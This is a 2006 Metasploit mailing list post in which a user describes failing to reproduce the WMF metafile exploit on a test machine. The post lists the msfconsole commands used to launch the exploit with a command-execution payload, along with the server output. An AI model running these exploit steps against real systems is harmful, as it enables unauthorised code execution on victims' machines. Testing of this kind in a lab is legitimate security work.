Metasploit mailing list archives

unable to reproduce WMF exploit


From: exceed at email.si (/dev/null)
Date: Tue, 10 Jan 2006 13:02:20 +0100

Sorry for the off-topic...

Seems that everybody was able to reproduce the WMF exploit except me :)

Here are the steps I performed:

- use ie_xp_pfv_metafile
- set PAYLOAD win32_exec
- set CMD cmd.exe
- exploit

msf ie_xp_pfv_metafile(win32_exec) > exploit
[*] Waiting for connections to http://192.168.0.1:8080/
[*] HTTP Client connected from 192.168.0.10:1075, sending 1592 bytes of 
payload...

The file is saved on disk, but when I open the directory in Windows Explorer 
nothing happens. Well, a few times explorer.exe crashed, but that's all. No 
cmd.exe execution. I don't have indexing disabled...

I have tried even with the old versions of the exploit, I have tried with Gzip 
and chunked disabled, I have tried with EXITPROC seh and thread, I used FF, IE 
and even wget. I don't have DEP enabled, I don't use any AV on my test box...

The most amazing thing: when I try calc.bmp generated by Mr. Moore it works 
like a charm... Obviously I am doing something wrong.
